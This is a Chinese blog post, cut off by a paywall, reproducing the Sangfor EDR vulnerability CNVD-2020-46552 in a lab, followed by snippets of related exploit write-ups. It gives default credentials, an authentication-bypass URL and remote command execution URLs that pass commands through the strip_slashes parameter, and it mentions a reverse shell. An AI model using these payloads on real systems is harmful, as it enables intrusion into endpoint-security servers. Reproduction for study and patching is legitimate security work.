sangfor EDR漏洞(CNVD-2020-46552)复现

最新推荐文章于 2024-09-25 16:37:07 发布
最新推荐文章于 2024-09-25 16:37:07 发布
阅读量4.4k 收藏 4
点赞数
分类专栏: 安全产品 文章标签: 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bigblue00/article/details/108434009
版权
本文详细介绍了深信服EDR(版本3.2.16, 3.2.17, 3.2.19)的一个远程命令执行漏洞,包括复现过程:任意用户登录、远程代码执行,并展示了如何利用python反弹shell。同时,给出了漏洞的修复方案,即通过在线升级深信服EDR以安装补丁。" 113679834,10294774,MySQL关联查询与自关联及视图操作详解,"['数据库理论', '关系型数据库', 'SQL查询']

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

声名:本项目仅用于测试工作和学习交流使用。 请使用者遵守当地相关法律,勿用于非授权测试,如作他用所承受的法律责任一概与本人无关!!!

深信服EDR远程命令执行漏洞影响版本:v3.2.16,3.2.17,3.2.19
本次测试环境搭建:EDR 3.2.19 ,kali(kali和EDR 3.2.19同在一个网段)

登录EDR账号:root
密码:edr@sangfor
查看ip
在这里插入图片描述

复现过程
1、任意用户登录

payload: https://ip地址/ui/login.php?user=任意用户名
例:https://192.168.195.33/ui/login.php?user=admin
在这里插入图片描述

2、远程代码执行

payload:
https://ip/tool/log/c.php?strip_slashes=system&limit=ls
https://ip/tool/log/c.php?strip_slashes=system&host=ls
https

最低0.47元/天 解锁文章
CNVD-2020-46552 深信服EDR远程代码执行漏洞复现
afei001
01-19 1108
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.漏洞修复 1.漏洞概述 终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件和管理平台软件共同组成。202008月18日左右检测到深信服EDR存在远程代码执行漏洞。该漏洞编号为CNVD-2020-46552。攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。 ...
CNVD-2020-46552 深信服EDR命令执行漏洞
nnn2188185的博客
03-22 1154
深信服终端监测响应平台(EDR)存在远程命令执行漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令。
EDR漏洞CNVD-2020-46552复现
PigLL的博客
08-24 1377
影响版本:v3.2.16,3.2.17,3.2.19 环境搭建:EDR 3.2.19 kali 使kali和EDR 3.2.19同在一个网段 登录EDR 3.2.19 账号:root 密码:edr@sangfor 登陆后发现他是固定,然后将他IP改为与kali为同一网段 查看ip 任意用户登录 https://ip地址/ui/login.php?user=任意用户名 远程代码执行 利用python脚本反弹shell 使用kali监听4444端口 执行python脚本 返回kali 监听成功 ...
Sangfor华东天勇战队:h2数据库console命令执行( CVE-2021-42392 漏洞
bring_coco的博客
06-26 1483
通过漏洞公布,可以看到是在org.h2.util.JdbcUtils.getConnection的javax.naming.Context出问题的。可以看到class javax.naming.InitialContext是javax.naming.Contex的子类,因此进入if。根据调用栈顺序,我们进入到org.h2.server.web.WebServer#getConnection方法,如下。进入org.h2.server.web.WebApp#process方法。
CNVD-2021-30167漏洞复现cnvd批量刷洞到后续利用完整经历
anlr2020的博客
09-07 1万+
记录一次挖漏洞的真实经历以及思路(本人文写的都偏傻瓜式,适合小白看,大神直接忽视) 首先新手没事可以多看看cnvd(国家信息安全漏洞贡献平台),链接在这https://www.cnvd.org.cn/,有一些最新的漏洞公告都会在这发布,你挖到的漏洞也可以提交到这,对你工作很有帮助。 某日无聊看看cnvd有没有新的漏洞公告,进入首页,点击热点关注-热点推荐,发现一堆最新的漏洞公告 看就看最新的,老漏洞被别人提交过的可能性更高,那么点第一个标题看看“用友NCBeanShell....漏洞..
深信服EDR任意用户登录与命令执行漏洞
剁椒鱼头没剁椒的博客
01-18 5071
终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。
SANGFOR-GENERAL-AND-SSL-MIB.mib
09-08
深信服EEM mib
SANGFOR-GENERAL-MIB.mib
09-08
深信服SANGFOR-GENERAL-MIB.mib
深信服EDR解决方案-V2.pptx
08-25
深信服EDR解决方案-V2
深信服AD域密码认证配置指导书
07-17
深信服关于WIFI上网认证的配置。 本配置指导文档主要适用于如下工程师: . 网络或应用管理人员 . 现场技术支持与维护人员 . 负责网络配置和维护的网络管理员
深信服应用交付报表系统 命令执行漏洞复现
09-28 2344
深信服应用交付报表系统是深信服最新推出的应用交付系列设备,其突出特色就是SINFOR AD的智能分析功能。该系统能够为用户提供包括多数据中心负载均衡、多链路负载均衡、服务器负载均衡的全方位解决方案。不仅实现对各个数据中心、链路以及服务器状态的实时监控,同时根据预设规则,将用户的访问请求分配给相应的数据中心、链路以及服务。
深信服 应用交付报表系统 download.php 任意文件读取漏洞
weixin_46801402的博客
11-04 1371
深信服 应用交付报表系统 download.php 任意文件读取漏洞
记某信漏洞复现
hackzkaq的博客
10-12 270
通常访问的页面如下,存在登录框。
Goby 漏洞发布|深信服下一代防火墙 loadfile.php 文件读取漏洞
m0_46699477的博客
10-07 1192
深信服下一代防火墙是一款以应用安全需求出发而设计的下一代应用防火墙。深信服下一代防火墙在 loadfile.php 处存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
深信服应用交付 AD 存在远程命令执行漏洞 附POC
nnn2188185的博客
09-28 745
深信服应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令
用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
热门推荐
0xSec
06-29 1万+
用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
使用深信服CVE-2024-38077检测工具及修复方案修复Windows Server 远程桌面授权服务漏洞
最新发布
modaner的博客
09-25 1438
另外,在一些特定的场景中,如堡垒机和云桌面VDI 环境,RDL 服务的启用也是必需的。此漏洞危害严重且影响范围较大。近日,微软官方修复了Windows Server 远程桌面授权服务(RDL)存在的一个远程代码执行漏洞(CVE-2024-38077)。临时关闭远程桌面授权服务,关闭该服务不会影响远程桌面服务,但关闭远程桌面授权服务后,RDP 登录时只能允许同时运行2个以内的会话。安天CVE-2024-38077漏洞应急处置工具是专项针对该漏洞的检测与处置工具,是图形化界面的工具,操作更简单。
深信服应用交付管理系统远程命令执行漏洞复现
薛定谔嘚喵博客
09-07 1525
深信服应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令。
sangfor-general-mib.mib
11-08
sangfor-general-mib.mib是一个用于网络设备监控和管理的管理信息库(MIB)文件。Sangfor(先锋网安)是一家专注于网络安全和云计算技术的公司,他们提供各种网络设备和解决方案,如防火墙、负载均衡器等。 sangfor-general-mib.mib文件定义了一系列的管理对象(MO)和相关属性,用于获取和控制Sangfor网络设备的状态和配置信息。这些MO包括设备的基本信息、硬件和软件版本、网络接口信息、CPU和内存使用情况等。 通过使用sangfor-general-mib.mib文件,网络管理员可以使用网络管理系统(NMS)监控和管理Sangfor设备。NMS可以通过Simple Network Management Protocol(SNMP)协议与设备进行通信,获取设备的运行状态、性能统计和日志信息,并且可以对设备进行配置和故障排除。 使用sangfor-general-mib.mib文件可以提供以下好处: 1. 高效的设备管理:通过NMS,管理员可以实时监测和管理Sangfor设备,快速发现和解决问题,提高网络的可靠性和性能。 2. 精确的性能监控:监控设备的CPU、内存、流量等关键性能指标,帮助管理员了解设备的负载情况,及时进行资源优化。 3. 故障排除和日志分析:通过故障报警和日志信息的收集与分析,管理员可以快速定位和解决设备故障,提高网络的可用性和可维护性。 总而言之,sangfor-general-mib.mib是一个定义了Sangfor网络设备的管理信息库(MIB)文件,通过使用该文件,管理员可以更好地监控和管理Sangfor设备,提高网络的可靠性和性能。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值